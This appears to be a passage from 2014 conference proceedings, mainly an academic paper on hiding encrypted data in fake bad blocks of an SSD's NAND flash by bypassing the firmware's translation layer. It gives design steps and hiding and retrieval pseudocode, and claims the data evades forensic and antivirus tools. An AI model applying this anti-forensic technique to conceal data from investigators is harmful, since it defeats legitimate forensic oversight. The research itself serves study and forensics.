“Baseline to help with network management,” in e-Business and
Telecommunication Networks. Springer Netherlands, 2006, pp. 158–
166.
[7] M. Adaniya, M. Lima, J. Rodrigues, T. Abrao, and M. Proenca Jr.,
“Anomaly detection using dsns and firefly harmonic clustering algorithm,” in Communications (ICC), 2012 IEEE International Conference
on, June 2012, pp. 1183–1187.
[8] M. V. O. Assis, L. F. Carvalho, J. J. P. C. Rodrigues, and M. L.
Proenca Jr., “Holt-winters statistical forecasting and ACO metaheuristic
for traffic characterization,” in Proceedings of IEEE International Conference on Communications, ICC 2013, Budapest, Hungary, June 9-13,
2013, 2013, pp. 2524–2528.
[9] G. Fernandes, A. Zacaron, J. Rodrigues, and M. L. Proenca Jr., “Digital
signature to help network management using principal component
analysis and k-means clustering,” in Communications (ICC), 2013 IEEE
International Conference on, June 2013, pp. 2519–2523.
[10] L. F. Carvalho, A. M. Zacaron, M. H. A. C. Adaniya, and M. L.
Proenca Jr., “Ant colony optimization for creating digital signature of
network segments using flow analysis,” in 31st International Conference
of the Chilean Computer Science Society, SCCC 2012, Valparaı́so,
Chile, November 12-16, 2012, 2012, pp. 171–180.
[11] U. Maulik and S. Bandyopadhyay, “Genetic algorithm-based clustering
technique,” Pattern Recognition, vol. 33, no. 9, 2000, pp. 1455–1465.
[12] J. Xiaopei, W. Houxiang, H. Ruofei, and L. Juan, “Improved genetic
algorithm in intrusion detection model based on artificial immune
theory,” in Computer Network and Multimedia Technology, 2009.
CNMT 2009. International Symposium on, Jan 2009, pp. 1–4.
[13] H. Guo, W. Chen, and F. Zhang, “Research of intrusion detection based
on genetic clustering algorithm,” in Consumer Electronics, Communications and Networks (CECNet), 2012 2nd International Conference on,
April 2012, pp. 1204–1207.
[14] M. Mitchell, An introduction to genetic algorithms. MIT Press, 1998.
[15] M. Dorigo, G. D. Caro, and L. M. Gambardella, “Ant algorithms for
discrete optimization,” Artificial Life, vol. 5, 1999, pp. 137–172.
[16] H. Jiang, Q. Yu, and Y. Gong, “An improved ant colony clustering
algorithm,” in Biomedical Engineering and Informatics (BMEI), 2010
3rd International Conference on, vol. 6, oct. 2010, pp. 2368 –2372.
[17] M. Dorigo, M. Birattari, and T. Stutzle, “Ant colony optimization,”
Computational Intelligence Magazine, IEEE, vol. 1, no. 4, nov. 2006,
pp. 28 –39.
[18] P. J. Rousseeuw, “Silhouettes: A graphical aid to the interpretation and
validation of cluster analysis,” Journal of Computational and Applied
Mathematics, vol. 20, no. 0, 1987, pp. 53 – 65.
[19] W. M. Spears and V. Anand, “A study of crossover operators in genetic
programming,” in ISMIS, 1991, pp. 409–418.
[20] C. A. Murthy and N. Chowdhury, “In search of optimal clusters using
genetic algorithms,” Pattern Recognition Letters, vol. 17, no. 8, 1996,
pp. 825–832.
[21] M. V. d. Assis, J. J. Rodrigues, and M. L. Proenca Jr., “A sevendimensional flow analysis to help autonomous network management,”
Information Sciences, vol. 278, no. 0, 2014, pp. 900 – 913.
[22] M. Lima, L. Sampaio, B. Zarpelão, J. Rodrigues, T. Abrao, and M. L.
Proenca Jr., “Networking anomaly detection using dsns and particle
swarm optimization with re-clustering,” in Global Telecommunications
Conference (GLOBECOM 2010), 2010 IEEE, Dec 2010, pp. 1–6.
W. Stallings, “Snmpv3: A security enhancement for snmp,” Communications Surveys Tutorials, IEEE, vol. 1, no. 1, First 1998, pp. 2–17.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
67
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
DeadDrop-in-a-Flash: Information Hiding at SSD NAND Flash Memory
Physical Layer
Avinash Srinivasan and Jie Wu
Panneer Santhalingam and Jeffrey Zamanski
Temple University
Computer and Information Sciences
Philadelphia, USA
Email: [avinash, jiewu]@temple.edu
George Mason University
Volgenau School of Engineering
Fairfax, USA
Email: [psanthal, jzamansk]@gmu.edu
Abstract—The research presented in this paper, to
the best of our knowledge, is the first attempt at
information hiding (IH) at the physical layer of a Solid
State Drive (SSD) NAND flash memory. SSDs, like
HDDs, require a mapping between the Logical Block
Addressing (LB) and physical media. However, the
mapping on SSDs is significantly more complex and is
handled by the Flash Translation Layer (FTL). FTL
is implemented via a proprietary firmware and serves
to both protect the NAND chips from physical access
as well as mediate the data exchange between the
logical and the physical disk. On the other hand, the
Operating System (OS), as well as the users of the SSD
have just the logical view and cannot bypass the FTL
implemented by a proprietary firmware. Our proposed
IH framework, which requires physical access to NAND
registers, can withstand any modifications to the logical
drive, which is accessible by the OS as well as users.
Our framework can also withstand firmware updates
and is 100% imperceptible in the overt-channels. Most
importantly, security applications such as anti-virus,
cannot detect information hidden using our framework
since they lack physical access to the NAND registers.
We have evaluated the performance of our framework
through implementation of a working prototype, by
leveraging the OpenSSD project, on a reference SSD.
Keywords—Anti-forensics; Covert Communication;
Information Hiding; Security; Solid State Drives.
I. Introduction
With IH, a majority of the research has primarily focused on steganography, the concept of hiding information
in innocuous existing files. There has also been considerable research on hiding information within file systems.
The advent of SSDs, among other things, has also created
new attack vectors from the view point of IH. However,
little research exists in regards to IH on SSDs. From an IH
view point, the combination of simplicity, standardization,
and ubiquity of the traditional Hard Disk Drive (HDD)
poses a major challenge. The lack of complex abstraction
between physical and logical drive, detailed information
on the structure of almost all file systems in use, along
with open source tools enabling physical access to HDDs as
well as analyzing and recovering both deleted and hidden
data makes IH on the HDDs futile. This can be noted
from the file system-based IH technique proposed in [1],
which utilizes fake bad blocks. Although, this sounds like
a generic solution since it is specific to file systems and is
independent of storage media. In reality, since the mapping
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
of logical blocks to physical flash memory is controlled by
the FTL on SSDs, this cannot be used for IH on SSDs. Our
proposed solution is 100% filesystem and OS-independent,
providing a lot of flexibility in implementation. Note that
throughout this paper, the term “physical layer” refers
to the physical NAND flash memory of the SSD, and
readers should not confuse it with the Open Systems
Interconnection (OSI) model physical layer.
Traditional HDDs, since their advent more than 50
years ago, have had the least advancement among storage
hardware, excluding their storage densities. Meanwhile,
the latency-gap between Random Access Memory (RAM)
and HDD has continued to grow, leading to an everincreasing demand for high-capacity, low-latency storage
to which the answer was SSDs. While flash memory has
served this purpose for many years in specialized commercial and military applications, its cost has only recently
decreased to the point where flash memory-based SSDs are
replacing the traditional HDDs in consumer class Personal
Computers (PCs) and laptops. Our proposed framework
can operate under two different scenarios – 1) A user hides
information strictly for personal use; 2) A group of users
collude with the SSD as the DeadDrop [2], and any user
can hide a secret message which can later be retrieved by
another user, with the appropriate map-file.
In contrast to traditional HDDs, SSDs introduce significant complexities [3] including: 1) An inability to support
in-place data modification; 2) Incongruity between the
sizes of a “programmable page” and an “erasable block”;
3) Susceptibility to data disturbances; and 4) Imposing
an upper bound on their longevity due to progressive wear
and/or degradation of flash cells. While these complexities
are inevitable to provide the expected performance and
longevity from SSDs, they also pair well with the notion of
IH. These complexities, if exploited effectively, can provide
highly secure and robust IH.
Another technique, as noted by Wee [1], is similar to our
proposed data hiding methodology, and is to provide the
file system with a list of false bad clusters. Subsequently,
the file system discounts these blocks when hiding new
data, and as such, can be safely used for IH. Nonetheless,
in all of the aforementioned techniques, the entire HDD
can be easily read and analyzed for the existence of hidden
information using both open source and commercial tools.
However, SSDs as such have posed to be the biggest hurdle
faced by the digital forensics community [4][5]. Hence,
68
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
our proposed approach is very robust to detection and/or
destruction, depending on the motive of the user.
A. Assumptions and Threat Model
We assume that there is a key exchange protocol as well
as a Public Key Infrastructure (PKI) in place and known to
all participants including the adversary. Figure 1 captures
the basic idea of our IH framework. Alice and Bob are two
users, who wish to exchange secret messages in presence of
the adversary Eve. With our proposed framework, shown
in Figure 1, they can securely exchange secret messages
using the SSD as the DeadDrop. Additionally, they need
to exchange the corresponding map-file generated during
the hiding process. While several different approaches exist
that can be used during the above steps, we employ the
very popular PKI approach in our discussions. The tools
for hiding and retrieving secret messages on the SSD are
available to both Alice and Bob. If Eve wishes to extract
the secret message from the SSD, then she will need both
of these – the tool for retrieving the secret message and
the corresponding map-file. While obtaining the tool is
very hard, it cannot be completely disregarded. On the
other hand, obtaining the map-file can be safely ruled
out, particularly owing to the strong security properties
of the underlying PKI system that strengthens session
initiation with end user authentication with the help of
digital certificates. If Eve, somehow, gets access to the SSD
physically, she might try the following attacks. We discuss
our defense mechanisms to these attacks in section VI-A.
Attack-1: Get a complete logical image of the drive using
any available disk imaging tool.
Fig. 1. Hide-in-a-Flash Threat Model.
•
This is the first attempt at IH on SSDs at the
NAND flash memory physical layer. We have successfully implemented our secure IH technique on
the reference OCZ Vertex Series SATA II 2.5”
SSD. The algorithms used in our framework are
wear leveling compliant and do not impact the
SSD’s longevity. Additionally, our implementation
of the framework does not affect data integrity and
performance of the SSD.
•
We have adapted the code from the OpenSSD
project to bypass the FTL with Barefoot Controller firmware, which otherwise completely prevents access to physical flash memory.
•
The proposed IH framework is very robust and
secure – it can be implemented to be 100% undetectable without prior knowledge of its use, and
100% resistant to manufacturer’s updates including destructive SSD firmware updates that completely thwart the proposed IH framework. Most
importantly, it is 100% transparent to the user,
the OS, and even the FTL.
•
Our approach hides information within “false bad
blocks” tracked by the FTL in its bad blocks list,
thereby preventing any operations on those blocks
and making it resistant to updates or overwriting.
•
Our framework does not exploit the filesystem’s
data structure to hide information nor does it hide
data in various slack spaces and unallocated space
of a drive [7]. Consequently, it does not break the
information to be hidden into bits and pieces.
•
We have successfully identified functionalities of
firmware which are not part of Open-SSDs documentation through firmware reverse engineering.
We are working toward making it publicly available
through the OpenSSD project website, so that
others can continue their research using our information as the baseline.
•
Finally, we have designed a tool, by leveraging
OpenSSD framework, which can get a physical
image of an SSD (with Barefoot flash controller)
which we have tested during our evaluations. However, a few minor firmware functionalities are yet
to be built into this tool.
Attack-2: Try to destroy the drive by erasing it.
Attack-3: Get a physical image of the entire drive.
Attack-4: Launch a Man-in-the-Middle attack to sniff the
map-file, and subsequently apply it to the drive.
For any IH scheme to be effective, below are the two key
features expected to be satisfied: 1) Confidentiality of the
hidden message; and 2) Integrity of the hidden message.
Most importantly, a very critical feature for an effective
IH scheme is that it should conceal the very fact that a
secret message is hidden. Our proposed framework indeed
achieves all of the above three properties. We use Elliptic
Curve Cryptography (ECC) algorithms for encryption,
decryption, digital signatures, and for key exchange. ECC
algorithms are chosen because of the strong cryptographic
properties they meet with small keys sizes. As noted by
Rebahi et al. [6], a 160-bit ECC key provides equivalent
security to RSA with 1024-bit keys.
Our proposed “Hide-in-a-Flash” IH framework for
SSDs differs from existing techniques proposed for traditional HDDs in several key aspects that have been discussed throughout this paper. However, we have identified
ones that are pivotal to our research and present them in
our list of contributions below and in Section III-A.
B. Our Contributions
Our contributions, at the time of this writing and to
the best of our knowledge, can be summarized as follows:
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
69
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
C. Road Map
The remainder of this paper is organized as follows. We
begin with a review of relevant related works in Section II.
In Section III, we provide a background discussion on
SSDs, specifically focusing on their departure from traditional HDDs. We also discuss the OpenSSD platform in
this section. Section IV investigates various design choices
we had to make in designing our system. Later, Section V
presents details of the proposed IH framework followed by
evaluations methods used and an analysis of the results in
Section VI. Finally, in Section VII, we conclude this paper.
II. Related Work
All existing work on IH are proposed for HDDs and
nothing specific to SSDs. Those that are for HDDs, the
notable ones revolve around hiding information within
existing file systems within slack space and unallocated
space. Verhasselt [8] examines the basics of these techniques. Another technique, as noted in [1], is similar to our
proposed data hiding methodology, and is to provide the
file system with a list of false bad clusters. Subsequently,
the file system discounts these blocks when hiding new
data, and as such can be safely used for IH. Nonetheless,
in all of the aforementioned techniques, the entire HDD
can be easily read and analyzed for the existence of hidden
information using both open source and commercial tools.
However, SSDs as such have posed to be the biggest hurdle
faced by the digital forensics community [4][5]. Hence,
our proposed approach is very robust to detection and/or
destruction, depending on the motive of the user.
According to McDonald and Kuhn [9], cryptographic
file systems provide little protection against legal or illegal
instruments that force data owners to release decryption
keys once the presence of encrypted data has been established. Therefore, they propose StegFS, a steganographic
file system, which hides encrypted data inside unused
blocks of a Linux ext2 file system.
RuneFS [10] hides files in blocks that are assigned to
bad blocks inode, which happens to be inode 1 on ext2.
Forensic programs are not specifically designed to look at
bad blocks inode. Newer versions of RuneFS also encrypt
files before hiding them, making it a twofold problem. On
the other hand, FragFS [11] hides data within Master
File Table (MFT) of an New Technology File System
(NTFS) volume. It scans the MFT table for suitable entries
that have not been modified within the last year. It then
calculates how much free space is available and divides it
into 16-byte chunks for hiding data.
Khan et. al. [12] have applied steganography to hard
drives. Their technique overrides the disk controller chip
and positions the clusters according to a code, without
which, hidden information cannot be read. In [13], authors
propose a new file system vulnerability, DupeFile, which
can be exploited for IH. The proposed approach hides
data in plain sight in the logical disk by simply renaming
malicious files with the same name as that of an existing
good file. Since the renaming is done at the raw disk level,
the OS does not complain to the end user of such file
hiding. In another IH method, in [14], authors propose
information hiding in file slack space. This technique,
called HideInside, splits a given files into chunks, encrypts
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
them, and randomly hides them in the slack space of differ
files. The proposed technique also generates a map-file
that resides on a removable media, which will be used for
retrieval and reconstruction of the randomly distributed
encrypted chunks.
In [15], Nisbet et al. analyze the usage of TRIM as
an Anti-Forensics measure on SSDs. They have conducted
experiments on different SSDs running different operating
systems, with different file systems to test the effectiveness
of data recovery in TRIM enabled SSDs. Based on their
experiments it can be concluded that, with TRIM enabled,
Forensic Investigators will be able to recover the deleted
data only for a few minutes from the time TRIM was
issued.
Wang et. al. [16] have successfully hidden and recovered
data from flash chips. Here, authors use the term “flash
chips” to refer to removable storage devices like USB flash
drives. They use variation in the program time of a group
of bits to determine if a given bit is a 0 or a 1. They
convert the data to be hidden into bits, and determine
the blocks required. Authors have come up with a method
to program a group of bits overcoming default pagelevel programming. While their method is quite robust,
it suffers from a significant downside, which is the amount
of information that could be hidden. Their method can
hide up to 64 MB of data on a 32 GB flash drive, while
our proposed IH can hide up to 2 GB of information on a
32 GB SSD, which is an increase in hiding capacity of the
channel, by a factor of 16.
III.
SSD Background
In contrast to the mechanical nature of the traditional
HDDs, an SSD is more than just a circuit board containing numerous flash memory packages and a controller to
facilitate the interface between the OS and the physical
flash memory. SSDs may utilize either the NOR flash or
the NAND flash memory. As the latter is relatively cheap
it is highly used for consumer SSDs.
A. Salient Features
Below is a list of salient features of SSDs:
1. Flash Memory: At the lowest level, each flash memory package contains thousands of cells, each capable of
holding one or more bits. While read and write operations
on a cell are relatively fast, physical limitations imposed
by the storage medium necessitate cell erasure before
overwriting it with new information. Flash memory cells
are logically grouped into pages. A page is the basic unit
of reading and writing. Pages are grouped into blocks,
which is the basic unit of erasure. Blocks are grouped into
dies, and dies are grouped into flash memory packages, aka
banks. Within a SSD, multiple flash memory packages are
grouped to provide the total capacity of the drive.
2. Flash Translation Layer (FTL): In order to manage
the complexities of the physical layout, optimize the use
and endurance of the flash memory, and provide the
OS with the traditional block device interface of storage
devices, SSDs contain a controller which implements an
additional layer of abstraction beyond traditional HDDs
70
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
TABLE I. REFERENCE SSD OCZ VERTEX SPECIFICATION
Total number of banks
Blocks per Die
Cell Type
8
Dies per Bank
4096
2-level cells
Pages per Block
2
128
Cells per Page
17, 256
32 GB
Bits per Cell
34, 512
Total Size
Advertised capacity
30 GB
Over-provisioning
2 GB
known as the FTL. Below are the three fundamental operations of the FTL – 1) logical to physical block mapping;
2) garbage collection; and 3) wear leveling.
3. Pages Size, Spare Bytes & Error Correction: Traditional HDDs implement storage based on a predefined
allocation unit called a sector, which is a power of two.
To facilitate the mapping of logical blocks to physical
flash memory, the flash memory is manufactured with
page sizes also being powers of two. However, since flash
memory is susceptible to data disturbances caused by
neighboring cells, it is critical for the FTL to implement
an error correction mechanism. To accommodate the storage requirements of the Error Correction Code (ECC),
the flash memory is manufactured with additional spare
bytes, in which FTL can store the ECC. For instance, a
flash memory page may consist of 8192 bytes with 448
additional bytes reserved for ECC.
4. Bad Blocks: Due to the physical characteristics of the
flash memory as well as cell degradation over time, flash
memory packages may ship with blocks that are incapable
of reliably storing data, even with an ECC employed.
These blocks are tested at the factory and marked in a
specific location within the block to identify them as initial
bad blocks. During SSD manufacturing, the flash memory
is scanned for bad block markings and an initial bad block
list is stored for use by the FTL. Beyond this initial list of
bad blocks, the FTL must keep the list updated with the
inclusion of newly identified bad blocks at runtime.
5. Over-Provisioning: Write amplification, a serious
concern with SSDs, is an inevitable circumstance where the
actual amount of physical information written is greater
than the amount of logical information requested to be
written. On SSDs, this occurs for several reasons, including
but not limited to: need for ECC storage, garbage collection, and random writes to logical blocks. In order to
maintain responsiveness when the drive is near capacity
and longevity when flash memory cells begin to fail, SSDs
may be manufactured with more flash memory than they
are advertised with, a concept known as over-provisioning.
For example, an SSD containing 128GB of flash memory
may be advertised as 100GB, 120GB, or with 28%, 6.67%,
or 0% over-provisioning, respectively.
B. OpenSSD
The OpenSSD Project [17] was created by
Sungkyunkwan University in Suwon, South Korea in
collaboration with Indilinx, to promote research and
education on SSD technology. This project provides
the firmware source code for the Indilinx Barefoot
Controller used by several commercial SSD manufacturers
including OCZ, Corsair, Mushkin, and Runcore IV. The
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
firmware code provided in this project is an open source
implementation, and a version of research implementation
of a complete SSD known as Jasmine Board, is available
for purchase.
Table I summarizes the specifications of the reference
SSD. During the course of our research, we learned that the
Jasmine Board uses the same Indilinx Barefoot controller
firmware as our reference SSD, which is an OCZ Vertex
Series SATA II. We also learned that the firmware installation method used by the OCZ Vertex SSD. Furthermore,
the Jasmine Board involved setting of a jumper on the
SSD, to enable a factory or engineering mode. Upon
setting the jumper on the reference SSD and compiling
and running the firmware installation program adapted
from the OpenSSD Project, we were able to connect to
the SSD in factory mode with physical access to NAND
flash memory chips, bypassing the FTL.
IV. Framework Design Choices
We have successfully identified the following critical
pieces of information from the OpenSSD code about
firmware functionalities through reverse engineering, information which was otherwise not available on OpenSSD
documentation:
•
•
•
Block-0 of each flash memory package is erased
and programmed during the firmware installation
process.
First page of block-0 contains an initial bad block
list before the firmware installation, which will be
read by the installer, erased along with the remainder of block-0, and programmed with identical
information as part of the installation process.
In addition to page-0, a minimal set of metadata
such as the firmware version and image size is programed into pages-1 through 3, and the firmware
image itself is programmed into sequential pages
starting with page-4.
Based on our analysis of the firmware, we came up with
the following storage covert channels that can be used in
designing our IH framework.
1)
2)
3)
4)
Manipulating the FTL data structure: We considered the possibility of modifying the firmware and
utilizing it for IH. One possibility was to redesign
the wear leveling algorithm such that some blocks
will never be considered for allocation.
Utilizing the spare bytes: All spare bytes available
per page are not completely used. Some of the
spare bytes are used for storing ECC. Thus the
remaining spare bytes can be used for IH.
Using the blank pages in block zero: Only a few
pages of block zero were used during firmware
installation; the remaining were free for IH.
Manipulating the initial bad block list: By inserting
new bad blocks in the bad block list in block zero,
and using them for IH.
With due diligence, we decided against the first three
methods because OpenSSD’s implementation is a stripped
down version of the actual firmware. This means, the
full-blown version of the firmware could easily overwrite
71
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
Fig. 2. Flow chart illustrating the initial system design.
any modifications we make to the FTL data structure.
Therefore, the first method is not very useful. Though the
unused spare bytes can be used, it was uncertain whether
or not the firmware would use them during the life of the
SSD. Hence, the second method was decided against. As
with the blank pages on block 0, they did not provide much
room for hiding information because of which third method
was ruled out. Finally, we had narrowed down our choice to
one stable and robust method – manipulation of the initial
bad block list, details of which follow in the next section.
V. Information Hiding Framework
A. Process Overview
Scenario: Alice and Bob could be friends or total
strangers communicating over an insecure channel. Their
goal is to exchange secret messages over the insecure
channel in the presence of Eve, the adversary. As noted
in Section I-A, we will not discuss the details of key
negotiation as plenty of known works exist on this subject.
For simplicity, we assume the use of PKI in our discussions.
Step-1: Alice has the secret message Msec she wishes to
share with Bob.
Alice
Step-2: She generates a random session key Krand
that
she inputs to the Hiding Algorithm along with Msec .
Alice
Step-3: Msec is encrypted with Krand
generating the
following message:
E[Msec ]K Alice
(1)
rand
This message is then written into fake bad blocks.
Simultaneously, a map-file Fmap is generated. The purpose
of Fmap is identifying blocks holding the secret message.
Alice
Step-4: Alice then encrypts Fmap and Krand
with her
Alice
private key Kprv generating the following message. This
is necessary to provide Bob with a message integrity
verification service.
verif y
Alice
Msec
= E[Fmap ||Krand
]Kprv
Alice
(2)
verif y
She then encrypts the Msec
message with Bob’s
Bob
public key Kpub , generating the following message.
verif y
conf Msec
Alice
= E[(Fmap )||(Krand
)]K Bob
Copyright (c) IARIA, 2014.
pub
ISBN: 978-1-61208-376-6
(3)
12:
13:
14:
15:
16:
17:
18:
f ile ⇐ user input secret message
sizeOf (f ile)
blocksRequired = sizeOf
(block)
leastBadBlockBank = 0
for i = 0 to bank.count do
if (i.badBlocksEraseCount <
leastBadBlockBank.badBlocksEraseCount)
then
leastBadBlockBank = i
end if
end for
while (leastBadBlockBank.blocksinbadBlockList)
&&
(leastBadBlockBank.blocks.metadata==keyword)
&&
(count < blocksRequired) do
newBadBlock.count = leastBadBlockBank.block;
count + +
end while
P ayload = Encrypt(metadata, f ile)
payload.W rite()
newKey = encode(leastBadBlockBank, newBadBlock)
Fig. 3. Algorithm for Hiding
verif y
The message conf Msec
encrypted with Bob’s public
key provides confidentiality service for message exchange.
Note that, the use of encryption keys in this specific order
also provides communication endpoint anonymity.
verif y
to Bob. On receiving this
Step-5: Alice sends conf Msec
Bob
message, Bob uses his private key Kprv
to decrypts the
verif y
Alice
message extracting Msec
. Then, Bob uses Kpub
to
Alice
extract the Fmap and Krand . Note that Alice and Bob
could use either a client-server or P2P architecture to
eliminate the need for physical access to the SSD.
Alice
Steps-6 & 7: Bob extracts Fmap and Krand
. He inputs
Fmap to the Retrieving algorithm, presented in Figure 4,
which applies it to the SSD to retrieve and reconstruct the
encrypted secret message E(Msec )K Alice .
rand
Alice
Steps-8 & 9: Bob uses Krand
to decrypt E(Msec )K Alice
rand
and finally extracts the secret message Msec .
B. Initial Design
In the first phase of our research, we modified the
open SSD framework to our specific requirements and
tried to hide a test file. As illustrated in the flowchart
in Figure 2, we designed a simple tool with a command
line interface that receives filename as input from the user.
Subsequently, the tool decides the number of bad blocks
to be allocated for hiding that file based on the file size.
Finally, the tool chooses a random bank on the SSD and
allocates the required number of blocks. While allocating
the blocks, we made sure that the blocks are not part of
the initial bad block list the SSD was shipped with. If
the allocation is successful, copy the file to the specified
blocks and create the map-file (used to identify the bank
and block). The map-file is used for the retrieval process.
C. Challenges with the Initial Design
In this section, we address some of the challenges we
face with the initial design of our IH framework.
72
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
map-file ⇐ f ile received f rom sender
bankAndBlock = decode(map-file)
metadata = bankAndBlock.Read()
decrypt(metadata)
decrypt(f ile.Read())
f ile.W rite()
if then(ReadandErase)
Erase(bankAndBlock)
eraseCount + +
eraseCount.W rite()
end if
Fig. 4. Algorithm for Retrieving
1)
2)
3)
4)
As the number of bad blocks increase, firmware
installation fails, rendering the drive useless.
If we hide data in blocks that hold the firmware,
then firmware reinstallation would rewrite these
blocks, irrespective of their inclusion in the bad
block list.
As part of experiment, we did a complete physical
image of drive, including the bad blocks, and were
able to find that the hidden files signature was
visible along with the metadata.
Every time we added a new bad block and hid
data, we had to reinstall the firmware. This was
required because the firmware would only keep
track of the bad blocks that were in the list when
the firmware was installed.
D. Enhanced design
We shall now discuss our enhanced design with improvements to overcome the challenges of the initial design
as delineated above.
•
•
•
•
•
Uninstall the SSD firmware.
Enable the user to specify the banks on which bad
blocks have to be assigned and the number of bad
blocks to be allocated on each bank.
Have the tool allocate the user specified number
of blocks on user specified banks and append these
blocks to the bad block list maintained by the FTL.
Reinstall the firmware on the SSD.
Add metadata to user-created bad blocks to distinguish them from firmware identified bad blocks. In
our prototype implementation of the IH framework
on the reference SSD, we reserve the very first
byte of user-specified bad blocks to keep track
of its erase count, which serves as the metadata.
The erase count variable is initialized to 0, and is
incremented every time new data is written to the
corresponding block, since write operation on as
SSD is preceded by an erase operation.
Note that, as shown in the Table IV, the first byte is the
erase count which is followed by the data. This helps to
select the least-erased block every time we pick a block for
hiding, and make sure the block is empty.
As can be seen in Figure 3, we pick blocks from banks
that have the least erase count. We achieved this by
keeping track of the cumulative erase count, comparing
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
TABLE II. Information retrieval under different scenarios.
Condition
Firmware Reinstallation
NTFS Formatted Drive
Partitioned Drive
Populate Disk to Full Capacity
Factory Mode Erase
Hidden File Retrieved
Yes
Yes
Yes
Yes
No
the cumulative erase count of all the bad blocks in the
banks, and finally pick the one with the least value. Next,
in order to address the firmware overwrite problem, we
started excluding the first 32 blocks (This was done during
the pre-allocation of bad blocks) in every bank. Finally, in
order to escape from the physical imaging, we started to
encrypt both the metadata and the file. While retrieving
the file, we gave an option for the user to erase and retrieve
the file or just retrieve the file alone. If user chooses to erase
and retrieve the file, we erased the block and increased the
erase count by one such that the block was not used until
all the other bad blocks have reached a similar erase count.
VI. Evaluation of Enhanced Design
We confirm through evaluations that our framework is
100% undetectable and robust to firmware updates.
Experiment-1: We test the conditions under which the
secret message is retained and retrievable. Table II summarizes the different scenarios under which we evaluated our
framework on the reference SSD. As can be seen, we were
able to retrieve the secret message in every scenario except
when erased in the factory mode. However, this operation
requires access to the SSD in factory mode as well as
knowledge of factory commands specific to the firmware
in use, without which it is impossible to wipe the physical
memory of the SSD.
Experiment-2: With this experiment, our objective was
to determine the maximum number of blocks that can be
tagged as bad, both firmware-detected and user-specified,
before the firmware installation starts to fail. This would
give us the total amount of data that can be hidden safely,
using our IH framework, without causing drive failure.
We also wanted to know if hiding data would result in
any changes, as perceivable by a normal user. For this,
we gradually increased the bad block count in each bank,
in increments of 10. With every increment, we did the
following – 1) increment the counter tracking the bank’s
bad block count ; 2) re-install the firmware; 3) install
the file system on top of the firmware; and 4) check the
available logical disk space. During the experiments, we
determined that the threshold for number of blocks, as
a fraction of the total number of blocks per bank, that
can be tagged as bad, is approximately 2.6% per bank.
This is equivalent to 218 blocks per bank. Beyond this,
the firmware installation fails. We have summarized the
results in Table III. Furthermore, based on the results,
we conclude that bad block management is a part of
over-provisioning and hence, a typical user won’t notice
any changes to the logical structure of the disk when
information is hidden, proving that our system is 100%
imperceptible by end users.
Experiment-3: Finally, we wanted to test if any of the existing computer forensic tools would be able to discover the
73
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
TABLE III. Drive size with different bad block count.
Bad Block Count
25
50
75
100
109
Drive Size
29.7GB
29.7GB
29.7GB
29.7GB
29.7GB
secret messages hidden on an SSD using our IH framework.
We used freeware tools like WinHex and FTK imager.
Both the tools, though very popular and powerful, were
unsuccessful in getting past the logical disk. We confidently
conclude that none of the existing computer forensics tools,
at the time of this writing and to the best of our knowledge,
have the capability to access the physical layer of an SSD.
TABLE IV. Manipulated bad block layout.
Number of Bytes
1
Remaining bytes
Information
Erase Count
Hidden data
A. Defense against attacks
In Section I-A, we presented four possible attacks that
an adversary, Eve, can potentially try against our IH
framework. We shall discuss why none of these attacks will
be successful against our IH framework.
•
•
•
•
Attack-1 Defense: The hidden information is not
part of the logical drive. Hence, Eve will not benefit
from a logical image of the DeadDrop SSD.
Attack-2 Defense: SSD blocks that are tracked
as bad blocks by the FTL firmware are never
accessed and erased by the firmware. Hence, this
attack will not be successful.
Attack-3 Defense: Currently, it is impossible for
Eve to make a physical image of the SSD without
our modified OpenSSD software. Additionally, Eve
should have the ability to access the SSD into
factory mode with appropriate jumper settings,
and should know the firmware functionalities that
we have identified beyond those provided in the
OpenSSD documentation. Beyond this, she would
still need the random session key generated by
Alice that was used to encrypt the secret message.
Additionally, she would need Bob’s (recipient of
the map-file) private key to decrypt the random
session key and the map-file, without which the
secret message cannot be reconstructed. Therefore,
the feasibility of this attack can be safely ruled out.
Attack-4 Defense: Assuming Eve is able to sniff
the map-file from the traffic between Alice and
Bob, as discussed in Section V, she still needs Bob’s
private key to decrypt the map-file. Bob’s private
key, however, is not accessible to anyone other then
Bob himself. Hence, this attack is ruled out.
VII. Conclusion and Future Work
In this paper, we have presented the design, algorithms, and implementation details of secure and robust
IH framework that can hide information on SSDs at the
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
physical layer. We have presented multiple methods for IH
highlighting their strengths and weaknesses. Finally, we
have evaluated the proposed framework through real world
implementations on a reference SSD running Indilinx’s
Barefoot flash controller, which is used by various SSD
manufacturers including, Corsair, Mushkin, and Runcore
IV [18]. Consequently, this IH framework can be used
on SSDs from different manufacturers, making it quite
pervasive and ubiquitous.
The ability to interface SSDs with the OpenSSD platform and bypass the FTL has significant impact on the
Digital Forensics community. Also, this is the first step toward potential antiforensics techniques. Having discovered
this possibility, law enforcement agencies can now focus
on potential information theft and antiforensics attacks
on SSDs, which otherwise was deemed near impossible.
As part of our future work, we would lim to investigate
the potential of integrating more support for other popular proprietary firmware. This will enable to expand the
existing project to support forensics investigation of SSDs
from a wide array of manufacturers.
Acknowledgment
The authors would like to thank the Defense Cyber
Crime Centre, Linthicum, Maryland, USA, for the reference SSD drive used in the experiments.
References
[1]
[2]
[3]
[4]
[5]
[6]
[7]
[8]
[9]
[10]
[11]
[12]
C. K. Wee, “Analysis of hidden data in NTFS file system,” 2013, URL: http://www.forensicfocus.com/hidden-dataanalysis-ntfs [accessed: 2013-04-25].
“DeadDrop,” 2014, URL: http://en.wikipedia.org/wiki/Dead
